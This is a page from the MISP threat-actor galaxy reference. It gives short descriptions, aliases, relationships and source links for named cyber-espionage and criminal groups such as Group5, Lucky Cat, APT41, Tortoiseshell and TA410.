https://www.europol.europa.eu/newsroom/news/goznym-malware-cybercriminal-network-dismantled-in-international-operation

Group5

A threat actor using Iranian-language tools, Iranian hosting companies, operating from the Iranian IP space at times was observed targeting the Syrian opposition in an elaborately staged malware operation, Citizen Lab researchers reveal. The operation was first noticed in late 2015, when a member of the Syrian opposition flagged a suspicious email containing a PowerPoint slideshow, which led researchers to a watering hole website with malicious programs, malicious PowerPoint files, and Android malware. The threat actor was targeting Windows and Android devices of well-connected individuals in the Syrian opposition, researchers discovered. They called the actor Group5, because it targets Syrian opposition after regime-linked malware groups, the Syrian Electronic Army, ISIS (also known as the Islamic State or ISIL), and a group linked to Lebanon did the same in the past

The tag is: misp-galaxy:threat-actor="Group5"

Group5 is also known as:

  • G0043

Table 11990. Table References

Links

https://www.securityweek.com/iranian-actor-group5-targeting-syrian-opposition

https://attack.mitre.org/groups/G0043/

Honeybee

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

The tag is: misp-galaxy:threat-actor="Honeybee"

Honeybee is also known as:

  • G0072

Table 11991. Table References

Links

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

https://attack.mitre.org/groups/G0072/

Lucky Cat

A series of attacks, targeting both Indian military research and south Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skills, in conjunction with freely available Web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the email. For example, one email sent to an academic claimed to be a call for papers for a conference (CFP). The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’ like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack with what appeared to be source code stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous.ænThe attacks have been active from at least April 2011 up to February 2012. The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero day exploits or complicated threats, instead they rely on effective social engineering and lax security measures on the part of the victims.

The tag is: misp-galaxy:threat-actor="Lucky Cat"

Lucky Cat is also known as:

  • TA413

  • White Dev 9

Table 11992. Table References

Links

https://vx-underground.org/papers/luckycat-hackers-12-en.pdf

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf

https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global

https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic

RTM

There are several groups actively and profitably targeting businesses in Russia. A trend that we have seen unfold before our eyes lately is these cybercriminals’ use of simple backdoors to gain a foothold in their targets’ networks. Once they have this access, a lot of the work is done manually, slowly getting to understand the network layout and deploying custom tools the criminals can use to steal funds from these entities. Some of the groups that best exemplify these trends are Buhtrap, Cobalt and Corkow. The group discussed in this white paper is part of this new trend. We call this new group RTM; it uses custom malware, written in Delphi, that we cover in detail in later sections. The first trace of this tool in our telemetry data dates back to late 2015. The group also makes use of several different modules that they deploy where appropriate to their targets. They are interested in users of remote banking systems (RBS), mainly in Russia and neighboring countries.

The tag is: misp-galaxy:threat-actor="RTM"

RTM is also known as:

  • G0048

Table 11993. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

https://attack.mitre.org/groups/G0048/

Shadow Network

Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.

The tag is: misp-galaxy:threat-actor="Shadow Network"

Table 11994. Table References

Links

https://citizenlab.ca/wp-content/uploads/2017/05/shadows-in-the-cloud.pdf

Slingshot

While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).

The tag is: misp-galaxy:threat-actor="Slingshot"

Table 11995. Table References

Links

https://securelist.com/apt-slingshot/84312/

Taidoor

The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued out some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended targeted and so promptly disabled the Taidoor malware running on it. This indicated that while Taidoor malware were more widely distributed compared with those tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.

The tag is: misp-galaxy:threat-actor="Taidoor"

Taidoor is also known as:

  • G0015

  • Earth Aughisky

Table 11996. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

https://attack.mitre.org/groups/G0015/

https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html

https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat

TEMP.Veles

TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.

The tag is: misp-galaxy:threat-actor="TEMP.Veles"

TEMP.Veles is also known as:

  • Xenotime

  • G0088

  • ATK91

Table 11997. Table References

Links

https://dragos.com/resource/trisis-analyzing-safety-system-targeting-malware/

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://attack.mitre.org/groups/G0088/

https://cyberthreat.thalesgroup.com/attackers/ATK91

https://www.dragos.com/threat/xenotime/

WindShift

In August of 2018, DarkMatter released a report entitled “In the Trails of WINDSHIFT APT”, which unveiled a threat actor with TTPs very similar to those of Bahamut. Subsequently, two additional articles were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems. Pivoting on specific file attributes and infrastructure indicators, Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency.

The tag is: misp-galaxy:threat-actor="WindShift"

WindShift is also known as:

  • Windy Phoenix

Table 11998. Table References

Links

https://unit42.paloaltonetworks.com/shifting-in-the-wind-windshift-attacks-target-middle-eastern-governments/

https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf

https://unit42.paloaltonetworks.com/atoms/windyphoenix/

[Unnamed group]

Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operation. The identity of the actor behind the leak is currently unknown, however based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operation in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even year. Note -most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted: Lab Dookhtegam pseudonym ("The people whose lips are stitched and sealed" –translation from Persian) –In this channel attack tools attributed to the group 'OilRig' were leaked; including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more. Green Leakers–In this channel attack tools attributed to the group 'MuddyWatter' were leaked. The group’s name and its symbol are identified with the "green movement", which led the protests in Iran after the Presidential elections in 2009. These protests were heavily repressed by the revolutionary guards (IRGC) Black Box–Unlike the previous two channels this has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one before the highest -top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.

The tag is: misp-galaxy:threat-actor="[Unnamed group]"

Table 11999. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2019/05/Iranian-Nation-State-APT-Leak-Analysis-and-Overview.pdf

DUNGEON SPIDER

DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.

The tag is: misp-galaxy:threat-actor="DUNGEON SPIDER"

Table 12000. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-october-dungeon-spider/

Fxmsp

Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed active directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.

The tag is: misp-galaxy:threat-actor="Fxmsp"

Table 12001. Table References

Links

https://www.advanced-intel.com/blog/top-tier-russian-hacking-collective-claims-breaches-of-three-major-anti-virus-companies

Gnosticplayers

The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong encryption algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can cracked with various levels of difficulty --but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker told us he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker says this is not his target anymore, as he learned that other hackers have already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave into extortion demands and paid fees so breaches would remain private. "I came to an agreement with some companies, but the concerned startups won’t see their data for sale," he said. "I did it that’s why I can’t publish the rest of my databases or even name them."

The tag is: misp-galaxy:threat-actor="Gnosticplayers"

Table 12002. Table References

Links

https://www.zdnet.com/article/round-4-hacker-returns-and-puts-26mil-user-records-for-sale-on-the-dark-web/

https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/

https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/

https://www.zdnet.com/article/hacker-puts-up-for-sale-third-round-of-hacked-databases-on-the-dark-web/

https://www.zdnet.com/article/a-hacker-has-dumped-nearly-one-billion-user-records-over-the-past-two-months/

Hacking Team

The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company’s efforts to get back on its feet. The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.

The tag is: misp-galaxy:threat-actor="Hacking Team"

Table 12003. Table References

Links

https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/

https://en.wikipedia.org/wiki/Hacking_Team

https://www.vice.com/en_us/article/gvye3m/spy-tech-company-hacking-team-gets-hacked

OurMine

OurMine is known for celebrity internet accounts, often causing cyber vandalism, to advertise their commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes’ worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows, such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has claimed responsibility for hacking high- profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.

The tag is: misp-galaxy:threat-actor="OurMine"

Table 12004. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hbo-twitter-and-facebook-accounts-hacked-by-ourmine

https://gizmodo.com/welp-vevo-just-got-hacked-1813390834

https://www.grahamcluley.com/despite-appearances-wikileaks-wasnt-hacked/

https://en.wikipedia.org/wiki/OurMine

Pacha Group

Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors from Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are from Chinese origin. We have labeled the undetected Linux.Antd variants, Linux.GreedyAntd and classified the threat actor as Pacha Group.

The tag is: misp-galaxy:threat-actor="Pacha Group"

Table 12005. Table References

Links

https://www.intezer.com/blog-technical-analysis-pacha-group/

https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

Rocke

This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

The tag is: misp-galaxy:threat-actor="Rocke"

Rocke is also known as:

  • Aged Libra

Table 12006. Table References

Links

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/

https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

https://unit42.paloaltonetworks.com/atoms/agedlibra/

[Vault 7/8]

An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. This leaking was done through WikiLeaks, since March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until his arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, by many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA’s global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, include Apple’s iPhone, Google’s Android and Microsoft’s Windows and even Samsung TVs, which are turned into covert microphones.

The tag is: misp-galaxy:threat-actor="[Vault 7/8]"

Table 12007. Table References

Links

https://wikileaks.org/ciav7p1/

https://www.justice.gov/opa/pr/joshua-adam-schulte-charged-unauthorized-disclosure-classified-information-and-other-offenses

ZOMBIE SPIDER

On April 7, 2017, Pytor Levashov — who predominantly used the alias Severa or Peter Severa and whom Falcon Intelligence tracks as ZOMBIE SPIDER — was arrested in an international law enforcement operation led by the FBI. ZOMBIE SPIDER’s specialty was large-scale spam distribution, a fundamental component of cybercrime operations. Levashov was the primary threat actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.

The tag is: misp-galaxy:threat-actor="ZOMBIE SPIDER"

Table 12008. Table References

Links

https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/

https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/

https://www.justice.gov/opa/pr/justice-department-announces-actions-dismantle-kelihos-botnet-0

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

ViceLeaker

In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims; and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner-workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.

The tag is: misp-galaxy:threat-actor="ViceLeaker"

Table 12009. Table References

Links

https://securelist.com/fanning-the-flames-viceleaker-operation/90877/

SWEED

Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we’re calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that’s been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from what we’ve seen in the past in the way that it is packed, as well as how it infects the system. In this post, we’ll run down each campaign we’re able to connect to SWEED, and talk about some of the actor’s tactics, techniques and procedures (TTPs).

The tag is: misp-galaxy:threat-actor="SWEED"

Table 12010. Table References

Links

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

TA428

Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.

The tag is: misp-galaxy:threat-actor="TA428"

TA428 is also known as:

  • Colourful Panda

  • BRONZE DUDLEY

Table 12011. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology

https://www.recordedfuture.com/china-linked-ta428-threat-group

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop

https://blog.group-ib.com/task

https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op

https://www.youtube.com/watch?v=1WfPlgtfWnQ

https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf

https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf

LYCEUM

Lyceum is an Iranian APT group that has been active since at least 2014. They primarily target Middle Eastern governments and organizations in the energy and telecommunications sectors. Lyceum is known for using cyber espionage techniques and has been linked to other Iranian threat groups such as APT34. They have developed and deployed malware families like Shark and Milan, and have been observed using DNS tunneling and HTTPfor command and control communication.

The tag is: misp-galaxy:threat-actor="LYCEUM"

LYCEUM is also known as:

  • COBALT LYCEUM

  • HEXANE

  • UNC1530

  • Spirlin

  • MYSTICDOME

  • siamesekitten

  • Chrono Kitten

  • Storm-0133

Table 12012. Table References

Links

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

https://www.secureworks.com/research/threat-profiles/cobalt-lyceum

https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/

https://www.clearskysec.com/siamesekitten/

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

APT41

APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.

The tag is: misp-galaxy:threat-actor="APT41"

APT41 is also known as:

  • G0096

  • TA415

  • Blackfly

  • Grayfly

  • LEAD

  • BARIUM

  • WICKED SPIDER

  • WICKED PANDA

  • BRONZE ATLAS

  • BRONZE EXPORT

  • Red Kelpie

  • G0044

  • Earth Baku

  • Amoeba

  • HOODOO

  • Brass Typhoon

APT41 has relationships with:

  • uses: misp-galaxy:backdoor="Speculoos" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="BARIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="LEAD" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Brass Typhoon" with estimative-language:likelihood-probability="likely"

Table 12013. Table References

Links

https://securelist.com/winnti-faq-more-than-just-a-game/57585/

https://securelist.com/winnti-more-than-just-a-game/37029/

http://williamshowalter.com/a-universal-windows-bootkit/

https://www.microsoft.com/security/blog/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

https://securelist.com/games-are-over/70991/

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

https://www.dw.com/en/thyssenkrupp-victim-of-cyber-attack/a-36695341

https://www.bleepingcomputer.com/news/security/teamviewer-confirms-undisclosed-breach-from-2016/

https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

https://www.dw.com/en/bayer-points-finger-at-wicked-panda-in-cyberattack/a-48196004

https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/

https://401trg.com/burning-umbrella/

https://attack.mitre.org/groups/G0044/

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-july-wicked-spider/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/threat-profiles/bronze-export

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer

https://assets.documentcloud.org/documents/7210602/FLASH-AC-000133-TT-Published.pdf

https://www.cfr.org/cyber-operations/winnti-umbrella

https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html

https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/

https://www.mandiant.com/resources/report-apt41-double-dragon-a-dual-espionage-and-cyber-crime-operation

https://www.cfr.org/cyber-operations/apt-41

https://attack.mitre.org/groups/G0096

https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf

Tortoiseshell

A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.

The tag is: misp-galaxy:threat-actor="Tortoiseshell"

Tortoiseshell is also known as:

  • IMPERIAL KITTEN

  • Yellow Liderc

  • Imperial Kitten

  • TA456

  • DUSTYCAVE

  • Crimson Sandstorm

Table 12014. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain

https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897

https://ctoatncsc.substack.com/p/cto-at-ncsc-summary-week-ending-october

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html

https://ics-cert.kaspersky.com/publications/reports/2023/09/25/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

POISON CARP

Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.

The tag is: misp-galaxy:threat-actor="POISON CARP"

POISON CARP is also known as:

  • Evil Eye

  • Red Dev 16

  • Earth Empusa

Table 12015. Table References

Links

https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/

https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/

https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html

TA410

Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “Lookback”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note confusion between Malware, Campaign and ThreatActor)

The tag is: misp-galaxy:threat-actor="TA410"

Table 12016. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals

https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

